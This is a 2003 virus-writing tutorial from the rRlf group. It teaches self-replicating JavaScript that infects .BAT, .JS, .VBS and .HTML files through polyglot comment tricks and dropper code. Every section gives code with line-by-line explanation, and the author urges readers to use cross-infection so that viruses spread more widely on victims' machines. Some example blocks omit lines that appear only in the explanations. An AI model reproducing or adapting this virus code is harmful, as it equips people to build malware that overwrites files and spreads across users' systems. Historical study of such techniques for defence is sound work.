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Cross Infection in JavaScript by Second Part To Hell

.intro words

  This article is a conclusion of my JS.Sinope, JS.Charon and some other silly ideas
  I got while coding anything senseless or drinking beer. :D Anyway, I think these
  techniques will be really successful, because you're able to spread your virus
  with much more extensions. Now, let's start and see, what we're able to do.


  1) BAT / JS infection via goto and '/*' - '*/'
  2) BAT / JS infection via code includeing
  3) VBS / JS infection via code includeing
  4) HTML / JS infection via code includeing

.BAT / JS infection via goto and '/*' - '*/'

  This technique I used in my JS.Charon (aka. I-Worm.Xaron). It infects .JS
  and .BAT files. Both extensions use just one virusbody. That means, that
  the BAT and the JS file of the virus have the same code.  The virus infects
  a file named 'victim.js' and 'victim.bat' in the current directory. OK, now
  let's look at the code:

 - - - - - - - - [BAT|JS infection-example I] - - - - - - - -
goto bat
var fso=WScript.CreateObject('Scripting.FileSystemObject')
var shell=WScript.CreateObject('WScript.Shell')
copy %0 victim.bat
if not exist virus.js goto endbat
copy %0 virus.js
cscript virus.js
 - - - - - - - [BAT|JS infection-example I end] - - - - - - - 

  As you can see, the code is a bat-code and a js-code. The main reason, that
  the program works is, that the BAT-part doesn't stop, if there is any error.
  Something important is also, that we have to run the other extension. There
  could be a real silly error. The program would work forever. What to do? Check
  if the other file extension already exist. OK, you saw the code, now let's have
  a look at the explanation.

 - - - - - - - [BAT|JS infection-example I explanation] - - - - - - - 

>> /*
>> goto bat
>> */
	This part tells the bat-extension, that it shall jump to the real bat-part.
	If the running file is a JS, it does nothing. If a '/*' doesn't exist,
	a fatal syntax error would occure, and the program would stop. It's better
	to write the real batch part at the end of the code, otherwise you can't use
	letters like '< ', ' >' or '%' in the JavaScript.

>> var fso=WScript.CreateObject('Scripting.FileSystemObject')
>> var shell=WScript.CreateObject('WScript.Shell')
	These are two variables we need to Write/Open/Read from files and Run files.
	Nothing more.

>> mycode=fso.OpenTextFile(WScript.ScriptFullName).ReadAll()
	We read the whole code from our own virus file. Now the variable 'mycode'
	contains everything from our file.

>> victim=fso.OpenTextFile('victim.js',2)
	Let's open the first file to infect with write access. If we want to work with
	that file, we will use the variable 'victim'.

>> victim.Write(mycode)
>> victim.Close()
	We write our code, which we saved in the variable 'mycode' to the file we have
	opend before. After that we close that file, because we don't need it anymore.

>> batpart=fso.CreateTextFile('virus.bat')
>> batpart.Write(mycode)
>> batpart.Close()
	Because of the fact, that we want to run ourself with .BAT extension too, we
	create a new file, write our code to it, and close it again.

>> shell.Run('virus.bat')
	Now we run the file we generated before. Now the same code runs with with .BAT

>> /*
>> :bat
	The JavaScript did, what it should do. Now the batch part starts. Before the
	':bat'-lable we write a '/*', so the JavaScript won't have an error. At the start
	of the code we jumped to this lable.

>> copy %0 victim.bat
	Let's infect the first file 'victim.bat'. We copy ourself to this file, and guess
	what? It contains our code.

>> if not exist virus.js goto endbat
	We want to run the JavaScript-part too, and because of that we have to check,
	if we have already run the .JS part of our program. If it already exist, we jmp
	to the end.

>> copy %0 virus.js
>> cscript virus.js
	Now we copy ourself to a .JS file and run the file. Now the same starts with JS

>> :endbat 
>> */
	Here you can see the lable, which we use to jump to, if the .js part already ran.
	Next of that you can see the end of the JavaScript.

 - - - - - - - [BAT|JS infection-example I explanation end] - - - - - - - 

.BAT / JS infection via code includeing

  A more elegant, but also more difficult way to infect BAT files is, to include the
  code of the JavaScript to a .BAT file, which writes the code to a new .JS and runs it.
  To do this, we have o use the DOS-command 'echo ... >> file.JS'. Not as the type I, this
  time the BAT file doesn't contain the same code as the .JS. Moreover the BAT is just a
  dropper of the JavaScript. Anyway, it contains the virus, and executes it. OK, now let's
  have a look at the example.

 - - - - - - - [BAT|JS infection-example II] - - - - - - - 

var fso=WScript.CreateObject('Scripting.FileSystemObject')
nl=String.fromCharCode(13)+String.fromCharCode(10); big=String.fromCharCode(62);
batch=fso.CreateTextFile('victim.bat', 2)
batch.WriteLine('cls'+nl+'@echo off'+nl+'echo.'+big+'virus.js')
eval('for (i=0; i'+String.fromCharCode(60)+'13; i++) { myline=me.ReadLine(); batch.WriteLine("echo "+myline+"'+big+big+'virus.js") }')
batch.WriteLine('cscript virus.js')
batch.Close(); me.Close()

 - - - - - - - [BAT|JS infection-example II end] - - - - - - -

  First important thing is, that the first line of the code is an empty line.
  That's because of the fact, that we have to delete the file, which shall contain
  the virus, have to be empty, so we delete it. As you can see, we read every line,
  and write it to the batch file. OK, seems to be understandable. Now let's have
  a look at the explanation of the whole thing:

 - - - - - - - [BAT|JS infection-example II explanation] - - - - - - -

	I alreay explained this empty line. It's generated by the batch-virus-dropper
	to delete the file content of the virus-file. We have to add it also to the
	first generation, because we read 13 lines, otherwise there will be a 'read
	after end of file'-error.

>> var fso=WScript.CreateObject('Scripting.FileSystemObject')
>> me=fso.OpenTextFile(WScript.ScriptFullName)
	We need the 'file-system object', so we declare it :). And we need the code of
	our file, so we open ourself. Now we use ourself via the variable 'me'.

>> nl=String.fromCharCode(13)+String.fromCharCode(10); big=String.fromCharCode(62);
	This is a very important part of the code. The variable 'nl' contains the ASCII
	code of 'jump to next line'. That's just to short our code. The variable 'big'
	contains the sign '>'. We want to write something to a batch file, and as you
	may know, batch doesn't allow strings like the '>'. So we use it as a ASCII-string.
	Otherwise our dropper won't write all files with that signs to our new virus,
	and nothing would work.

>> batch=fso.CreateTextFile('victim.bat', 2)
>> batch.WriteLine('cls'+nl+'@echo off'+nl+'echo.'+big+'virus.js')
	We create a new file to write to it. After that we write some lines to it. Nothing
	very important for the virus.

>> me.ReadLine()
	We read one line of our code. That's our empty line, just because we don't have to
	include it again (the dropper will do it for us :D).

>> eval('for (i=0; i'+String.fromCharCode(60)+'13; i++) { myline=me.ReadLine(); batch.WriteLine("echo "+myline+"'+big+big+'virus.js") }')
	You may ask: "Why do we use 'eval'?". There's a simple answer: We want to read and write
	thirteen lines, so we use a 'for'. But our 'for' needs a '>'-sign. And I told you before
	that DOS doesn't allow that sign. So we use our variable named 'big'. But we can't use
	any variable in the 'for'. So we have to use the whole command as a string in the command
	'eval' (eval runs strings). OK, what does that line? We read 13 lines, and write it to
	our dropper. Now the dropper will contain the whole code of ourself. :)
>> batch.WriteLine('cscript virus.js')
	At the end of the batch writing part we include a 'cscript' to run the .JS in BAT format.
	That's the most important line, otherwise everything would be senseless.

>> batch.Close(); me.Close()
	We close the batch file (the dropper) and our own file, because we don't need them

>> me=fso.OpenTextFile(WScript.ScriptFullName)
>> victim=fso.OpenTextFile('victim.js',2)
>> victim.Write(me.ReadAll())
>> victim.Close()
	Because of the reason, that we want to infect the 'victim.js' too, we open ourself again,
	open the 'victim.js', write everthing from our file to the victim file and close it again.
	We finished doing everything. :)

 - - - - - - - [BAT|JS infection-example II explanation end] - - - - - - -

.VBS / JS infection via code includeing

  Now we move to another file-extension: To VisualBasicScript. To infect this format
  we have to know, that we can't use any ->"<- [chr(34)], otherwise the VBS will
  stop and won't do, what we want it to do. The principle is the same like the
  BAT-part. Just let's look at the code:

 - - - - - - - - [VBS|JS infection-example] - - - - - - - -

var fso=WScript.CreateObject('Scripting.FileSystemObject')
nl=String.fromCharCode(13)+String.fromCharCode(10); comma=String.fromCharCode(34);
vbsfile=fso.CreateTextFile('victim.vbs', 2)
vbsfile.WriteLine('set fso=WScript.CreateObject('+comma+'Scripting.FileSystemObject'+comma+')'+nl+'set shell=WScript.CreateObject('+comma+'WScript.Shell'+comma+')'+nl+'set virus=fso.CreateTextFile('+comma+'virus.js'+comma+')')
for (i=0; i<12; i++) { myline=me.ReadLine(); vbsfile.WriteLine('virus.WriteLine'+comma+myline+comma) }
vbsfile.Close(); me.Close()

 - - - - - - - [VBS|JS infection-example end] - - - - - - -

  OK, you can see, that some things are same as in our BAT-cross infection example.
  Fortunately it's not as hard as the BAT thing, because we just have to look for
  chr(34)'s, which we don't have to include (not two letters). Now I'll explain
  the important lines of this code.

 - - - - - - - - [VBS|JS infection-example explanation] - - - - - - - -

>> var fso=WScript.CreateObject('Scripting.FileSystemObject')
>> me=fso.OpenTextFile(WScript.ScriptFullName)
	We know this lines from the other example in BAT. It just creates the filesystem object
	and opens our own file, because we need its code.

>> nl=String.fromCharCode(13)+String.fromCharCode(10); comma=String.fromCharCode(34);
	We know the variable 'nl', but what's 'comma'? It's only the ASCII string for
	["]. Because of the reason, that our VBS file will need this sign to write
	the virus code to a new .JS file, we must not use it. So we use the ASCII.

>> vbsfile=fso.CreateTextFile('victim.vbs', 2)
	Here we create the new file named 'victim.vbs'. This will be our virus

>> vbsfile.WriteLine('set fso=WScript.CreateObject('+comma+'Scripting.FileSystemObject'+comma+')'+nl+'set shell=WScript.CreateObject('+comma+'WScript.Shell'+comma+')'+nl+'set virus=fso.CreateTextFile('+comma+'virus.js'+comma+')')
	Here we write some important lines to the .VBS file. The Visual Basic Script 
	will use fso, shell to write to a file (the new virus), and to execute the
	file. So we generate it here. The variable 'virus' in VBS creates a new file
	named 'virus.js'. Guess what it should be? Yeah, you're right: Our new virus.

>> for (i=0; i<12; i++) { myline=me.ReadLine(); vbsfile.WriteLine('virus.WriteLine'+comma+myline+comma) }
	Now we read 12 lines of our code and write it to the .VBS, so the VBS will
	contain our viruscode, and write it to the new file.

>> vbsfile.WriteLine('virus.Close()'+nl+'shell.Run'+comma+'virus.js'+comma)
	In the end let's Close the variable 'virus' in the VB script and run the
	new generated file, which contains our JS-virus-code. :)

>> vbsfile.Close(); me.Close()
	This closes the VBS-file and our own file, because we don't need it anymore.

>> me=fso.OpenTextFile(WScript.ScriptFullName)
>> victim=fso.OpenTextFile('victim.js',2)
>> victim.Write(me.ReadAll())
>> victim.Close()
	You'll need this lines from the other example. We overwrite the file named
	'victim.js' with our code, and close the file.

 - - - - - - - [VBS|JS infection-example explanation end] - - - - - - -

.HTML / JS infection via code includeing

  HTML is the most famous internet-language, and that's the reason, why we also
  should infect that type of files. OK, you know, we're able to include any
  script language in HTML, and for that we need for our little program. We use a
  JS file, to include the code of the virus to a new file and run it. OK, I think
  you understood it, so let's have a look at the example.

 - - - - - - - - [HTML|JS infection-example] - - - - - - - -

var fso=WScript.CreateObject('Scripting.FileSystemObject')
nl=String.fromCharCode(13)+String.fromCharCode(10); comma=String.fromCharCode(34);
html.Write('<html><body><script language='+comma+'VBScript'+comma+'>'+nl+'On Error Resume Next'+nl+'Set fso=CreateObject('+comma+'Scripting.FileSystemObject'+comma+')'+nl+'Set shell=CreateObject('+comma+'Wscript.Shell'+comma+')'+nl+'if err.number=429 Then shell.Run javascript:location.reload()'+nl+'set virus=fso.CreateTextFile('+comma+'C:\\virus.js'+comma+')'+nl)
for (i=0; i<7; i++) { myline=me.ReadLine(); html.Write('virus.WriteLine'+comma+myline+comma+nl) }

 - - - - - - - [HTML|JS infection-example end] - - - - - - -

  This little code generates a .html file, which contains the viruscode, and runs
  the viruscode after writing to a new .JS file. Now we're also able to infect
  .HTM(L) files. The principle of this code is the same as the VBS or BAT infection.
  Only thing is, that we have to write a little more to the new file than just the
  code. We include the code to a .VBS in the .HTML file, otherwise it would be a little
  more difficult. OK, maybe you don't really understand this. So look at the explanation.

 - - - - - - - - [HTML|JS infection-example explanation] - - - - - - - -

>> var fso=WScript.CreateObject('Scripting.FileSystemObject')
	That's again the FileSystemObject, which we need to read and write to a file
	(read: our code - write: the victim)

>> nl=String.fromCharCode(13)+String.fromCharCode(10); comma=String.fromCharCode(34);
	That's again the two variables, that contain special strings. Variable
	'nl' contains the ASCII of -jump to next line- and 'comma' contains the
	ASCII of ["].

>> me=fso.OpenTextFile(WScript.ScriptFullName)
>> html=fso.CreateTextFile('victim.html')
	Here we open our file, because we have to read from it, and we create the
	'victim.html', because we want to write to it.

>> html.Write('<html><body><script language='+comma+'VBScript'+comma+'>'+nl+'On Error Resume Next'+nl+'Set fso=CreateObject('+comma+'Scripting.FileSystemObject'+comma+')'+nl+'Set shell=CreateObject('+comma+'Wscript.Shell'+comma+')'+nl+'if err.number=429 Then shell.Run javascript:location.reload()'+nl+'set virus=fso.CreateTextFile('+comma+'C:\\virus.js'+comma+')'+nl)
	Here we write the first important things to the .html. These things are for instands the
	html-format (<html><body><...>) and some parts of the VBS-file (the declaration of the
	important variables in VBS [fso and shell], the part, which checks, if the user wants to run
	the ActivX [otherwise we reload the document], and the creation of the new file, which shall
	contain the new [old :D] viruscode).

>> for (i=0; i<7; i++) { myline=me.ReadLine(); html.Write('virus.WriteLine'+comma+myline+comma+nl) }
	Here we read the first 7 lines, and write it to the VBScript in the HTML, because it has
	to contain the JavaScript code.

>> html.WriteLine('virus.Close()'+nl+'shell.Run'+comma+'C:\\virus.js'+comma+nl+'</scrip'+'t></bo'+'dy></h'+'tml>')
	In the end we add some more things to the html: We close the new generated .JS file
	and run it. After that we add the end of the body and html-tag in the html-file.

 - - - - - - - [HTML|JS infection-example explanation end] - - - - - - -

.last words

  To infect more than one file-extension is for sure much more successful than infect just one.
  The reason for this is easy: You're able to infect more files on one victim's computer, and
  because of that we're able to spread the virus much better. Much examples for that have been
  existing long since much time. Nearly every intelligent virus uses cross-infection or infection
  of more than one file extension nowadays. That's also the reason, why you should use it. :)
  Here, at the end of my article I want to say sorry for my grammar and spelling mistakes
  in this text. All in all, I hope, you had fun while reading this paper, and you've learned
  little more things.

							- - - - - - - - - - - - - - -
							  Second Part To Hell/[rRlf]  
							  written in june 2003
							- - - - - - - - - - - - - - -